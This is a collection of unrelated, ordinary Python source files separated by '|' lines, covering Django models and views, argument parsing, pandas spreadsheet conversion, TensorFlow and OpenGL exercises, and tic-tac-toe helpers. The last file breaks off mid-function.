migrations.CreateModel(
name='School_vision',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('photo', models.FileField(upload_to='uploads/')),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
import configargparse
import os
import configparser
import yaml
import sys
sys.path.append('src/')
from cnn_photon_id_parser import set_parser
# print(parser.__dir__())
# p_yaml= configargparse.ArgParser(
# config_file_parser_class=configargparse.YAMLConfigFileParser)
# p_yaml.add('-c','--config', is_config_file=True)
# p_yaml.add('-gO','--G_OutDir',type=yaml.safe_load,required=True)
# # p_yaml.add('-IO','--IOdirs',type=yaml.safe_load,action="append")
# # p_yaml.add('-InDir_DP',required=False)
# p_yaml.add('-metrics','--Metrics',type=yaml.safe_load)
p_ini = configargparse.ArgParser(
config_file_parser_class=configargparse.ConfigparserConfigFileParser
)
p_ini.add('-c','--config',is_config_file=True)
# p_ini.add('-gO','--IOdirs')
# p_ini.add('--g_outdir')
p_ini.add('--g_outdir',env_var='GLOBAL_OUTDIR')
# IF EXPECTED ARG IS A DICT THEN, ADD IT WITH `add_argument` and add `type=yaml.safe_load`
p_ini.add_argument('--metrics',type=yaml.safe_load)
# p_ini.add('-metrics','--Metrics')
def main(argv):
args = set_parser()
# args = p_yaml.parse_args()
print(args)
print("train out is ", args.train_out)
print("train out is ", type(args.train_out))
print("train out is is false?", args.train_out is False)
print("train out is is None?", args.train_out is None)
print("train out exists?", os.path.exists(args.train_out))
# args = p_ini.parse_args()
# print(args)
# print(os.path.exists(args.g_outdir))
# print(os.path.exists(args.IOdirs))
# cfg = configparser.ConfigParser()
# cfg.read('config.ini')
# print(cfg.sections())
# print(os.path.exists(cfg['IOdirs']['G_OutDir']))
# print(type(args.IOdirs))
# print(type(args.IOdirs['DataProcessing_OUT']))
# print(args.IOdirs.items())
# args=p_ini.parse_args()
# print(args)
# cfg = args.config.ConfigParser()
# print(cfg)
# print(args['IOdirs'])
return
if __name__ == '__main__':
main(sys.argv[1:])
|
from django import http
from functions import get_routing_js
def routing_js(request):
"""
View to render routing js.
SHOULD NOT BE USED IN PRODUCTION
"""
response = http.HttpResponse(get_routing_js())
response['Content-Type'] = 'application/javascript'
return response
|
#!/usr/bin/env python
import sys
import glob
def handle_dir(dirname):
for f in sorted(glob.glob(dirname + "/*.log")):
# scen total-time 0.0 max-time-step 0.0 time-20-moves 0.0 total-len 0.0 subopt 0.0 valid
num_lines = 0
time = 0
        subopt = 0.0
for line in open(f):
tokens = line.strip().split("\t")
if len(tokens) == 12:
time += float(tokens[2])
subopt += float(tokens[10])
assert tokens[11] == "valid", tokens[11]
num_lines += 1
print f, num_lines
print "total time: ", round(time, 1)
print "geo mean(subopt): ", round(subopt / num_lines, 2)
handle_dir(sys.argv[1])
|
from .texture import BaseTexture, Material
from .decompress_ import decompress
from . import file_object, mesh, file_readers
|
#!/usr/bin/env python
# encoding: utf-8
"""
reminder.py
Created by yang.zhou on 2012-09-29.
Copyright (c) 2012 zhouyang.me. All rights reserved.
"""
import re
import logging
from rq import Queue
from redis import Redis
from models import Member, Reminder
from oauth2lib import message_request
def get_usernames(content):
    names_list = re.findall(ur"@[0-9a-zA-Z\u4e00-\u9fa5_#]{1,18}\s", content)
return [username[1:-1] for username in names_list]
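# Illustrative behaviour (note the pattern requires a trailing whitespace character,
# so a mention at the very end of the content is not matched):
# get_usernames(u"thanks @alice and @bob ")  ->  [u'alice', u'bob']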
def create_mention(**kwargs):
receiver = Member.getMemberByUsername(kwargs['username'])
if receiver:
kwargs.update(receiver=receiver)
reminder = Reminder.create(**kwargs)
else:
logging.error("no member found")
def send_mentions(**kwargs):
q = Queue(connection=Redis(), async=False)
r = q.enqueue_call(func=create_mention, kwargs=kwargs, timeout=40)
return r
|
#!/usr/bin/python3
# function that finds a peak in a list of unsorted integers.
def aux(list_of_integers, first, last):
""" recursive auxiliary function """
x = last - first
    if x <= 1:  # one or two elements left (also covers a single-element list)
if list_of_integers[first] > list_of_integers[last]:
return first
else:
return last
middle = first + x // 2
if list_of_integers[middle] < list_of_integers[middle + 1]:
return aux(list_of_integers, middle, last)
return aux(list_of_integers, first, middle)
def find_peak(list_of_integers):
""" function that finds a peak in a list of unsorted integers """
if len(list_of_integers) == 0:
return None
return list_of_integers[aux(
list_of_integers, 0, len(list_of_integers) - 1)]
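# Illustrative calls (a sketch, not part of the original exercise):
# find_peak([1, 2, 4, 6, 3])     -> 6
# find_peak([4, 2, 1, 2, 3, 1])  -> 3   (any local peak is a valid answer)
# find_peak([7])                 -> 7
# find_peak([])                  -> None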
|
#!/usr/bin/python
#------------------------------------------------------------------------------
# Copyright 2008-2012 Istituto Nazionale di Fisica Nucleare (INFN)
#
# Licensed under the EUPL, Version 1.1 only (the "Licence").
# You may not use this work except in compliance with the Licence.
# You may obtain a copy of the Licence at:
#
# http://joinup.ec.europa.eu/system/files/EN/EUPL%20v.1.1%20-%20Licence.pdf
#
# Unless required by applicable law or agreed to in
# writing, software distributed under the Licence is
# distributed on an "AS IS" basis,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied.
# See the Licence for the specific language governing
# permissions and limitations under the Licence.
#------------------------------------------------------------------------------
import os
import getopt
import sys
from wnodes.cli.utils import load_config
from wnodes.cli.utils import get_config
from wnodes.cli.utils import checks
from wnodes.cli.commands import errors
from wnodes.cli.commands import create_occi
class CreateImage:
'''A command-line program to create a given image.'''
def __init__(self):
self.verbose = False
self.parameters = {'size':'small',
'number':1,
'tag':'',
'conf':(False,'wnodes-cli.cfg')}
def __usage(self):
print ("Usage: wnodes_create_image [OPTION] -t IMAGE_NAME\n"+
"Request to instantiate a set of images with the same characteristic\n\n"+
"OPTION\n"+
" -t,--imagetag=IMAGE_NAME specifies the image tag name. It is\n"+
" mandatory.\n"+
" -s,--imagesize=SIZE specifies the size of the image.\n"+
" Supported values are:\n"+
" - small\n"+
" - medium\n"+
" - large\n"+
" - extralarge\n"+
" Please look at System Guide doc for\n"+
" more information. The default of\n"+
" which is %s.\n"
% self.parameters['size'] +
" --vo=VO_NAME specifies the vo name.\n"+
" -b, --number=NUMBER specifies how many times the specified\n"
" image must be created. The default of\n"+
" which is %s.\n"
% str(self.parameters['number']) +
" -c, --conf=CONF_FILE specifies a customized conf filename.\n"+
" --verbose show verbose information. The\n"+
" default of which is %s.\n"
% self.verbose +
" -h, --help display this help and exit.\n"+
" -v, --version output version information and exit.\n")
def __parse(self):
try:
opts, args = getopt.getopt(sys.argv[1:], \
"hvc:t:s:b:", \
["help", "version", "verbose", \
"conf=", "imagetag=", "imagesize=", "vo=", "number="])
except getopt.GetoptError, err:
print str(err)
self.__usage()
sys.exit(2)
for key, value in opts:
if key in ("-h", "--help"):
self.__usage()
sys.exit()
elif key in ("-c", "--conf"):
self.parameters['conf'] = (True, value)
elif key in ("-b", "--number"):
self.parameters['number'] = int(value)
elif key in ("-t", "--imagetag"):
self.parameters['tag'] = value
elif key in ("-s", "--imagesize"):
self.parameters['size'] = value
elif key == "--vo":
self.parameters['vo'] = value
elif key == "--verbose":
self.verbose = True
elif key in ("-v", "--version"):
self.version = __import__('cli').get_release()
sys.exit()
else:
raise errors.OptionError("unhandled option")
if self.parameters['tag'] == '':
self.__usage()
msg = ("Image tag not specified. Please use the option -t or" +
" --imagetag")
raise errors.NoOptionSpecified(msg)
if self.parameters['size'] not in ('small', 'medium', 'large', 'extralarge'):
self.__usage()
raise errors.OptionError("Image size wrong")
def doWork(self):
self.__parse()
if not self.parameters['conf'][0]:
user_config_file = \
get_config.ConfigurationFileLocation(\
file_name = self.parameters['conf'][1]).get_configuration_file()
else:
user_config_file = \
get_config.ConfigurationFileLocation(\
file_name = self.parameters['conf'][1]).get_custom_configuration_file()
load_user_data = \
load_config.LoadUserConfig(\
config_file = user_config_file).load_user_data()
obj = create_occi.CreateImage(\
load_user_data, self.parameters)
if self.verbose:
print obj.get_command()
count = 0
location_image = {}
while count < self.parameters['number']:
res, msg = obj.get_output()
location_image[count] = (res, msg)
count += 1
for key, value in location_image.iteritems():
if value[1] == '':
for x in value[0]:
if 'Location: ' in x:
print x.split('Location: ')[1]
break
else:
print value[1]
if __name__ == '__main__':
try:
a = CreateImage()
a.doWork()
except get_config.NoFileFound, err:
print '\n\nExecution: ', err
except get_config.NoPathFound, err:
print '\n\nExecution: ', err
except load_config.WrongConfigurationFile, err:
print '\n\nExecution: ', err
except load_config.WrongConfigurationSettings, err:
print '\n\nExecution: ', err
except checks.NoCmdFound, err:
print '\n\nExecution: ', err
except errors.OptionError, err:
print '\n\nExecution: ', err
except errors.NoOptionSpecified, err:
print '\n\nExecution: ', err
except load_config.GeneralError, err:
print '\n\nExecution: ', err
except create_occi.CreateImageError, err:
print '\n\nExecution: ', err
except KeyboardInterrupt:
        print '\n\nExecution interrupted!'
sys.exit(1)
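# Example invocation (illustrative; option values below are placeholders):
#   wnodes_create_image -t my_image_tag -s medium -b 2 --vo=my_vo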
|
# 2017-03-11 jkang
# practice tf.case
# ref: http://web.stanford.edu/class/cs20si
import tensorflow as tf
x = tf.random_uniform([], -2, 2)
y = tf.random_uniform([], -2, 2)
def f1():
return tf.add(x, y)
def f2():
return tf.sub(x, y)
def f3():
return tf.constant(0, dtype=tf.float32)
val = tf.case({tf.less(x, y): f2, tf.greater(x, y): f1},
default=f3, exclusive=True)
sess = tf.InteractiveSession()
print(sess.run(tf.less(x, y)))
print(sess.run(tf.greater(x, y)))
print(sess.run(val))
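# Note (sketch): each sess.run call above re-evaluates the random ops, so the three
# printed values come from different samples of x and y. Fetching everything in a
# single run keeps one consistent sample, e.g.:
# print(sess.run([tf.less(x, y), tf.greater(x, y), val]))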
sess.close()
|
"""import matplotlib.pyplot as plt
import numpy as np
import NSGAII
import Solution as sl
import SPEAII
import NSPSO
import Problem
import ParetoUtil as pu
import NSPSOMM
import concurrent.futures
def main():
problemlist = [Problem.UF1(),Problem.UF2(),Problem.UF3(),Problem.UF4()] #Problem.ZDT1(), Problem.ZDT2(), Problem.ZDT3(), Problem.ZDT4(),
populationSizelist = [40]#[12, 40, 60, 100, 1000]
generationCountlist = [100]#[50, 100, 500, 1000]
mutationRate = 0.2
corssoverRate = 0.7
initSolution = None
# Resultplot("",True,problem,initSolution)
for populationSize in populationSizelist:
for generationCount in generationCountlist:
for i in range(1):
with concurrent.futures.ThreadPoolExecutor() as executor:
NSGAMMResult = []
SPEAMMResult = []
NSPSOResult = []
NSPSOMMResult = []
initSolution = sl.solution.CreatePopulation(populationSize, problemlist[0])
futureNSGAMM1 = executor.submit(NSGAII.NSGAII(problemlist[0], popSize=populationSize).Evolve, generationCount, initSolution, mutationRate, corssoverRate,True)
futureSPEAMM1 = executor.submit(SPEAII.SPEAII(problemlist[0], popSize=populationSize, eliteSize=populationSize).Evolve, generationCount, initSolution, mutationRate, corssoverRate,True)
futureNSPSO1 = executor.submit(NSPSO.NSPSO(problemlist[0], popSize=populationSize).Evolve, generationCount, initSolution)
futureNSPSOMM1 = executor.submit(NSPSOMM.NSPSOMM(problemlist[0], popSize=populationSize).Evolve, generationCount, initSolution)
initSolution = sl.solution.CreatePopulation(populationSize, problemlist[1])
futureNSGAMM2 = executor.submit(NSGAII.NSGAII(problemlist[1], popSize=populationSize).Evolve, generationCount, initSolution, mutationRate, corssoverRate,True)
futureSPEAMM2 = executor.submit(SPEAII.SPEAII(problemlist[1], popSize=populationSize, eliteSize=populationSize).Evolve, generationCount, initSolution, mutationRate, corssoverRate,True)
futureNSPSO2 = executor.submit(NSPSO.NSPSO(problemlist[1], popSize=populationSize).Evolve, generationCount, initSolution)
futureNSPSOMM2 = executor.submit(NSPSOMM.NSPSOMM(problemlist[1], popSize=populationSize).Evolve, generationCount, initSolution)
initSolution = sl.solution.CreatePopulation(populationSize, problemlist[2])
futureNSGAMM3 = executor.submit(NSGAII.NSGAII(problemlist[2], popSize=populationSize).Evolve, generationCount, initSolution, mutationRate, corssoverRate,True)
futureSPEAMM3 = executor.submit(SPEAII.SPEAII(problemlist[2], popSize=populationSize, eliteSize=populationSize).Evolve, generationCount, initSolution, mutationRate, corssoverRate,True)
futureNSPSO3 = executor.submit(NSPSO.NSPSO(problemlist[2], popSize=populationSize).Evolve, generationCount, initSolution)
futureNSPSOMM3 = executor.submit(NSPSOMM.NSPSOMM(problemlist[2], popSize=populationSize).Evolve, generationCount, initSolution)
initSolution = sl.solution.CreatePopulation(populationSize, problemlist[3])
futureNSGAMM4 = executor.submit(NSGAII.NSGAII(problemlist[3], popSize=populationSize).Evolve, generationCount, initSolution, mutationRate, corssoverRate,True)
futureSPEAMM4 = executor.submit(SPEAII.SPEAII(problemlist[3], popSize=populationSize, eliteSize=populationSize).Evolve, generationCount, initSolution, mutationRate, corssoverRate,True)
futureNSPSO4 = executor.submit(NSPSO.NSPSO(problemlist[3], popSize=populationSize).Evolve, generationCount, initSolution)
futureNSPSOMM4 = executor.submit(NSPSOMM.NSPSOMM(problemlist[3], popSize=populationSize).Evolve, generationCount, initSolution)
NSGAMMResult.append(futureNSGAMM1.result())
SPEAMMResult.append(futureSPEAMM1.result())
NSPSOResult.append(futureNSPSO1.result())
NSPSOMMResult.append(futureNSPSOMM1.result())
NSGAMMResult.append(futureNSGAMM2.result())
SPEAMMResult.append(futureSPEAMM2.result())
NSPSOResult.append(futureNSPSO2.result())
NSPSOMMResult.append(futureNSPSOMM2.result())
NSGAMMResult.append(futureNSGAMM3.result())
SPEAMMResult.append(futureSPEAMM3.result())
NSPSOResult.append(futureNSPSO3.result())
NSPSOMMResult.append(futureNSPSOMM3.result())
NSGAMMResult.append(futureNSGAMM4.result())
SPEAMMResult.append(futureSPEAMM4.result())
NSPSOResult.append(futureNSPSO4.result())
NSPSOMMResult.append(futureNSPSOMM4.result())
for i in range(len(problemlist)):
locations =[]
Delta = []
GD = []
IGD = []
locations.append((problemlist[i].perfect_pareto_front(),"","-","",1))
plotTitle = "Population Size %d, Generation Count %d, Function %s" % (
populationSize,
generationCount,
type(problemlist[i]).__name__,
)
with open( "NSPSO-NSGA-UFTest.txt", "a") as text_file:
print(plotTitle, file=text_file)
locations.append((pu.GetPopulationLocations(NSGAMMResult[i][0]),"NSGAIIMM","","1",1))
Delta.append((NSGAMMResult[i][1][:,[0,1]],"NSGAIIMM","-","",1))
GD.append((NSGAMMResult[i][1][:,[0,2]],"NSGAIIMM","-","",1))
IGD.append((NSGAMMResult[i][1][:,[0,3]],"NSGAIIMM","-","",1))
locations.append((pu.GetPopulationLocations(SPEAMMResult[i][0]),"SPEAIIMM","","P",1))
Delta.append((SPEAMMResult[i][1][:,[0,1]],"SPEAIIMM","-","",1))
GD.append((SPEAMMResult[i][1][:,[0,2]],"SPEAIIMM","-","",1))
IGD.append((SPEAMMResult[i][1][:,[0,3]],"SPEAIIMM","-","",1))
locations.append((pu.GetPopulationLocations(NSPSOResult[i][0]),"NSPSO","","x",1))
Delta.append((NSPSOResult[i][1][:,[0,1]],"NSPSO","-","",1))
GD.append((NSPSOResult[i][1][:,[0,2]],"NSPSO","-","",1))
IGD.append((NSPSOResult[i][1][:,[0,3]],"NSPSO","-","",1))
locations.append((pu.GetPopulationLocations(NSPSOMMResult[i][0]),"NSPSOMM","",".",1))
Delta.append((NSPSOMMResult[i][1][:,[0,1]],"NSPSOMM","-","",1))
GD.append((NSPSOMMResult[i][1][:,[0,2]],"NSPSOMM","-","",1))
IGD.append((NSPSOMMResult[i][1][:,[0,3]],"NSPSOMM","-","",1))
with open("NSPSO-NSGA-UFTest.txt", "a") as text_file:
for i in range(len(Delta)):
print("Metric {0}\t{1}\t{2}\t{3}".format(Delta[i][1],Delta[i][0][-1,1],GD[i][0][-1,1],IGD[i][0][-1,1]), file =text_file )
Resultplot(plotTitle + ' - Delta' , False, Delta)
Resultplot(plotTitle + ' - GD' , False, GD)
Resultplot(plotTitle + ' - IGD' , False, IGD)
Resultplot(plotTitle, False, locations)
def Resultplot(title, showPlot, dataList):
fig = plt.figure()
plt.title(title)
for dataV in dataList:
plt.plot(
dataV[0][:, 0],
dataV[0][:, 1],
linestyle=dataV[2],
marker=dataV[3],
label=dataV[1],
alpha=dataV[4])
plt.legend()
plt.grid()
if showPlot:
plt.show()
else:
plt.savefig(title + ".pdf")
if __name__ == "__main__":
main()
"""
|
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 9 00:00:27 2018
@author: Home
"""
import numpy as np
# Write a function that takes as input a list of numbers, and returns
# the list of values given by the softmax function.
def softmax(L):
expl = np.exp(L)
sumE = sum(expl)
result =[]
for i in expl:
result.append(i*1.0/sumE)
return result
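# Minimal usage sketch (not part of the original exercise): softmax outputs are
# positive and sum to 1, so they can be read as probabilities.
if __name__ == "__main__":
    scores = [1.0, 2.0, 3.0]
    probs = softmax(scores)
    print(probs)       # roughly [0.090, 0.245, 0.665]
    print(sum(probs))  # ~1.0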
|
from aiogram import types
nazad = types.InlineKeyboardMarkup(
inline_keyboard=[
[
types.InlineKeyboardButton(text="<-- Назад", callback_data="Назад8")
]
])
|
import datetime
import calendar
import cx_Oracle
import sys
import os
from datetime import timedelta, date, time
import csv
import pandas as pd
from pandas import DataFrame
import numpy as np
from matplotlib import style
filename = 'output.csv'
target = open(filename, 'w')
#excelData = pd.ExcelFile('Lindsey Done With Adjustments Altered.xlsx')
df = pd.read_excel('Lindsey Done With Adjustments Altered.xlsx', sheet_name='CIM 2016')
index_of_columns = df.columns
num_columns = len(df.columns.tolist())
length_of_columns = len(index_of_columns)
print "*" * 36
print "num_columns " + str(num_columns)
index_of_rows = df.index
print "length of rows " + str(len(index_of_rows))
length_of_rows =(len(index_of_rows))
print "A" * 36
#index_of_columns = df.columns
print "index_of_columns "+ str(index_of_columns)
print "type index_of_columns "+str(type(index_of_columns))
print type(index_of_columns[0])
print type(index_of_columns[1])
print type(index_of_columns[2])
print (index_of_columns[0])
print (index_of_columns[1])
print (index_of_columns[2])
print (index_of_columns[-1])
#for i in range(0, )
target.write("M,CORE_FORECAST,CORE_FORECAST_DESC,WEEKS,,30,30,NJW,N\n")
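# Each spreadsheet cell below becomes one "D,..." line: the item id from column 0,
# the column's date (written twice), then the cell value.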
for x in range(1, length_of_columns):
for i in range(0, length_of_rows):
row_value = df.at[index_of_rows[i], index_of_columns[0]]
date_value = index_of_columns[x].strftime("%d-%b-%Y").upper().split(' ')[0]
#date_value = date_value.strftime("%d-%b-%Y").upper()
#date_value2 = str(date_value).split(' ')[0].upper()
data_value = df.at[index_of_rows[i], index_of_columns[x]]
target.write("D,COREFCST,COREFCST_DESC,,"+str(row_value)+","+ str(date_value).upper()+","+ str(date_value).upper()+","+ str(data_value)+",N\n")
#date_value = date_value.split(' ')[0]
print "B" * 36
print "index_of_rows " + str(index_of_rows)
label = df.index[0]
print label
lst = df.index.tolist()
print "lst " + str(lst)
print lst[-1]
print "rows " + str(index_of_rows)
print index_of_rows[0]
print index_of_rows[1]
print type(index_of_rows)
print type(index_of_rows[0])
print type(index_of_rows[1])
print "C" * 36
print "Let's access some cells"
#value = df.at['row','col']
#value2 = df.loc['row','col']
value = df.at[index_of_rows[0], index_of_columns[0]]
print "1 is " + str(value)
value2 = df.loc[index_of_rows[0], index_of_columns[2]]
print "2 is " + str(value2)
datey = index_of_columns[2]
value3 = df.loc[index_of_rows[0], datey]
print "3 is " + str(value3)
'''
target.write("++++++++++++++++++++++++++++++++++++Begin Run+++++++++++++++++++++++++++++++++++++++\n")
target.write("\n")
target.write("\n")
value = df.at[index_of_rows[0], index_of_columns[0]]
print "1 is " + str(value)
allDates = list(df.columns[1:])
print "All Dates"
allDates = list(df.columns[1:])
#print allDates[0].now().date()#.format("%d.%b.%Y")
small = allDates[0].now().date()
#then = datetime.datetime.strptime(when, '%Y-%m-%d').date()
#adjusted = datetime.datetime.strptime(str(small), '%d-%b-%Y').date()
small = small.strftime("%d-%b-%Y").upper()
print "small = " + str(small)
#datetime.datetime.now().date()
print "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
#value = df.at(0,12).values
#Item 04/04/16
#B03934 S4AAMM 7
print df.index
for index, row in df.iterrows():
print('index: ', index)
print "*********"
print('row: ', row)
print "---------"
target.write(str(row[0]))
#allRows = pd.DataFrame(df.row)
#print allRows
vv2 = df.iloc[1,1]
#vv2 = df.loc['2','04/04/16']
print "Vv2 = " + str(vv2)
print "ddddddddddddddddddddddddddddddddddddddddddddd"
'''
print "++++++++++++++++++++++++++++++++++++++++End Run"
'''
df2 = pd.DataFrame({0: [3]});df2
#pd.Timestamp('20140202')})
i = 0
#date = time.strftime("%x")
#print df
d={}
d['CIM 2016'] = df
#print d
#print "MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM"
#print df.head(1)
#print "MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM"
df2.insert(0,"M","D")
df2.insert(1,"Forecast Name","COREFCST")
df2.insert(2,"Description","Current Forecast")
df2.insert(3,"Demand Class","")
#df["M"] ="D"
#df.head()
#print "mmsmdajondasjindasdnasdno " + str(matrix)
#for rowy in matrix:
# print "rowy" + str(rowy) + "\n"
#print "/////////////////////////////////////////"
#print "df.columns\n"
#print df.columns[1:]
#print df.columns
allDates = list(df.columns[1:])
#print allDates
#print df.index[1]
#print "\n+++++++++++++++++++++++++++++++++++++++++++++++++++\n"
#print df.T
#print "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
#print "df.values\n"
#print df.values
#print "df.index\n"
#print df.index
df.to_excel('ForEBS.xlsx',sheet_name='Logility Results')
#print "000000000000000000000000000000000000000000000000000000000000000000"
#print df2
df2.to_excel('Final EBS.xlsx',sheet_name='Logility Results')
for row in df.iterrows():
# iterate through all elements in the row
if (i >= 3):
break
#print "row" + str(row) + "\n"
#print "CMCMCmcmcmcmcmcmcmcmcmc\n"
#print "row" + str(row[1]) + "\n"
#Divide up the columns
vvDate = str(row[1]).split()
#for cc in vvDate:
# print "CC" + str(vvDate)
# print "row" + str(row) + "\n"
# print "CMCMC" + str(row[0])
# print "mmmm" + str(row[1])
#print str(row[2])
# array = [str(row[1]).split(' ')]
#print "ooooooooooooooooooooooooo\n"
#print str(array[0])
#print "\njjjjjjjjj\n"
#print array[1] + "\n"
#print array[2] + "\n"
i+=1
target.write("\n")
target.write("\n")
print "And finally, we close it."
'''
target.close()
|
import argparse
def arguments_parser_log_analysis():
"""Parses command-line arguments for log analysis.
Returns:
        argparse.ArgumentParser: Argument parser for log analysis
"""
parser = argparse.ArgumentParser()
parser.add_argument('--log-level', nargs='?', type=str,
default="INFO", const="INFO",
help="Logging level. Can take values among ['DEBUG',"
"'INFO', 'WARNING', 'ERROR', 'CRITICAL']",
dest='log_level')
parser.add_argument('--log-directories', nargs='?', type=str,
default="", const="",
help="Directories containing log files.",
dest='log_directories')
return parser
def arguments_parser_training_data():
    """Parses command-line arguments for generating training data.
    Returns:
        argparse.ArgumentParser: Argument parser for training data generation
    """
parser = argparse.ArgumentParser()
parser.add_argument('--log-level', nargs='?', type=str,
default="INFO", const="INFO",
help="Logging level. Can take values among ['DEBUG',"
"'INFO', 'WARNING', 'ERROR', 'CRITICAL']",
dest='log_level')
parser.add_argument('--log-directories', nargs='?', type=str,
default="", const="",
help="Directories containing log files.",
dest='log_directories')
parser.add_argument('--generate-full-pos', nargs='?', type=str,
default="", const="",
help="File where positive training data-points "
"generated in the IFTTT corpus format.",
dest='generate_full_pos')
parser.add_argument('--generate-t-channel-neg', nargs='?', type=str,
default="", const="",
help="File where negative training data-points "
"generated for Trigger Channel model should be "
"written to, if specified.",
dest='generate_t_channel_neg')
parser.add_argument('--generate-a-channel-neg', nargs='?', type=str,
default="", const="",
help="File where negative training data-points "
"generated for Action Channel model should be "
"written to, if specified.",
dest='generate_a_channel_neg')
parser.add_argument('--generate-t-fn-neg', nargs='?', type=str,
default="", const="",
help="File where negative training data-points "
"generated for Trigger Function model should be "
"written to, if specified.",
dest='generate_t_fn_neg')
parser.add_argument('--generate-a-fn-neg', nargs='?', type=str,
default="", const="",
help="File where negative training data-points "
"generated for Action Function model should be "
"written to, if specified.",
dest='generate_a_fn_neg')
parser.add_argument('--generate-t-fn-pos', nargs='?', type=str,
default="", const="",
help="File where positive training data-points "
"generated for Trigger Function model should be "
"written to, if specified.",
dest='generate_t_fn_pos')
parser.add_argument('--generate-a-fn-pos', nargs='?', type=str,
default="", const="",
help="File where positive training data-points "
"generated for Action Function model should be "
"written to, if specified.",
dest='generate_a_fn_pos')
return parser
def model_on_logs_arguments_parser():
"""Parses command-line arguments for running models on dialog logs.
Returns:
        argparse.ArgumentParser: Argument parser for running models on dialog logs
"""
parser = argparse.ArgumentParser()
parser.add_argument('--log-level', nargs='?', type=str,
default="INFO", const="INFO",
help="Logging level. Can take values among ['DEBUG',"
"'INFO', 'WARNING', 'ERROR', 'CRITICAL']",
dest='log_level')
parser.add_argument('--alpha', nargs='?', type=float,
default=0.85, const=0.85,
help="Threshold of confidence above which the slot is "
"deemed as confidently-filled without a need for "
"confirmation.", dest='alpha')
parser.add_argument('--beta', nargs='?', type=float,
default=0.25, const=0.25,
help="Threshold of confidence above which -- and below"
" alpha -- above which the slot is explicitly "
"confirmed before being accepted", dest='beta')
parser.add_argument('--log-directories', nargs='?', type=str,
default="", const="",
help="Directories containing log files.",
dest='log_directories')
return parser
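# Minimal usage sketch (not part of the original module); the argument values
# "DEBUG" and "logs/" are only illustrative.
if __name__ == "__main__":
    args = arguments_parser_log_analysis().parse_args(
        ["--log-level", "DEBUG", "--log-directories", "logs/"])
    print(args.log_level, args.log_directories)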
|
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
import numpy as np
from math import *
x=0
f=True
z=0
def myinit():
glMatrixMode(GL_PROJECTION)
glClearColor(1,1,1,1)
glClear(GL_COLOR_BUFFER_BIT)
gluPerspective(60,1,.1,50)
gluLookAt(10,10,10,0,0,0,0,1,0)
def draw():
glClear(GL_COLOR_BUFFER_BIT)
global x
global f
global z
glMatrixMode(GL_MODELVIEW)
    # big cube
glLoadIdentity()
glColor3f(0,0,0)
glTranslate(x,0,0)
glScale(1,.25,.5)
glutWireCube(5)
    # small cube
glLoadIdentity()
glTranslate(x,0,0)
glTranslate(0,1.25,0)
glScale(.5,.25,.5)
glutWireCube(5)
glColor(1,0,1)
glLoadIdentity()
glTranslate(x,0,0)
glTranslate(2,-.5,1.25)
glRotate(z,0,0,1)
glutWireTorus(.125,.5,12,8)
glLoadIdentity()
glTranslate(x,0,0)
glTranslate(-2,-.5,-1.25)
glRotate(z,0,0,1)
glutWireTorus(.125,.5,12,8)
glLoadIdentity()
glTranslate(x,0,0)
glTranslate(2,-.5,-1.25)
glRotate(z,0,0,1)
glutWireTorus(.125,.5,12,8)
glLoadIdentity()
glTranslate(x,0,0)
glTranslate(-2,-.5,1.25)
glRotate(z,0,0,1)
glutWireTorus(.125,.5,12,8)
glColor(1,1,0)
glLoadIdentity()
glTranslate(x,0,0)
glTranslate(2.2,-.3,.4)
glScale(.25,1,1)
glutSolidSphere(.3,20,20)
glLoadIdentity()
glTranslate(x,0,0)
glTranslate(2.2,-.3,-.4)
glScale(.25,1,1)
glutSolidSphere(.3,20,20)
if x > 7:
f = False
if x < -14:
f = True
if f:
x+=.01
z-=1
else:
x-=.01
z+=1
glFlush()
glutInit()
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutInitWindowSize(600,600)
glutCreateWindow(b" animated tribute for Deadmau5")
myinit()
glutDisplayFunc(draw)
glutIdleFunc(draw)
glutMainLoop()
|
#!/usr/bin/env python
PACKAGE = "hektar"
from dynamic_reconfigure.parameter_generator_catkin import *
gen = ParameterGenerator()
gen.add("target_pot", int_t, 0, "target position for the arm", 250, 0, 1023)
exit(gen.generate(PACKAGE, "hektar", "pid"))
|
from django.db import models
from django.contrib.sitemaps import ping_google
class Project(models.Model):
title = models.CharField(max_length=200, help_text="The title of the project")
slug = models.SlugField(help_text="Slug to use in the URL for the project")
teaser = models.TextField(help_text="Short description of the project for use in listings")
body = models.TextField(help_text="Full description of the project")
start_date = models.DateTimeField(help_text="Project start date", blank=True, null=True)
end_date = models.DateTimeField(help_text="Project end date", blank=True, null=True)
source_code = models.URLField(help_text="Url to source repository, or project hosting page", blank=True)
def save(self, force_insert=False, force_update=False):
super(Project, self).save(force_insert, force_update)
try:
ping_google()
        except Exception:
pass
@models.permalink
def get_absolute_url(self):
return("project_detail",(),{'slug': self.slug})
def __unicode__(self):
return self.title
class Meta:
ordering = ['title']
def has_summary(self):
""" Checks to see if the project has any summary information """
if self.start_date or self.end_date or self.source_code:
return True
else:
return False
|
"""
functions related to creating, printing,
and evaluating tic-tac-toe boards
:author: Ian Sulley
:note: I affirm that I have carried out the attached academic endeavors with full academic honesty,
in accordance with the Union College Honor Code and the course syllabus
"""
def remove_blank_lines(list_of_strings):
"""
Given a list of strings, return a copy
with all empty strings removed
:param list_of_strings: list of strings, some of which may be ''; this list is unchanged
:return: list identical to list_of_strings, but all empty strings removed
"""
result = list()
for s in list_of_strings:
if s != '':
result.append(s)
return result
def get_board_from_file(filename):
"""
Reads board, returns a list of rows.
:param filename: text file with a tic-tac-toe board such as
X X X
O X O
X O O
where each line is one row
:return: list of strings where each string is a
row from filename; any blank lines in the file are removed
Example: ["X X X", "O X O", "X O O"]
"""
board_list = []
board_file = open(filename, "r")
for line in board_file:
board_list.append(line.strip())
board_file.close()
board_list = remove_blank_lines(board_list)
return board_list
def print_row(row):
"""
Nicely prints a row of the board.
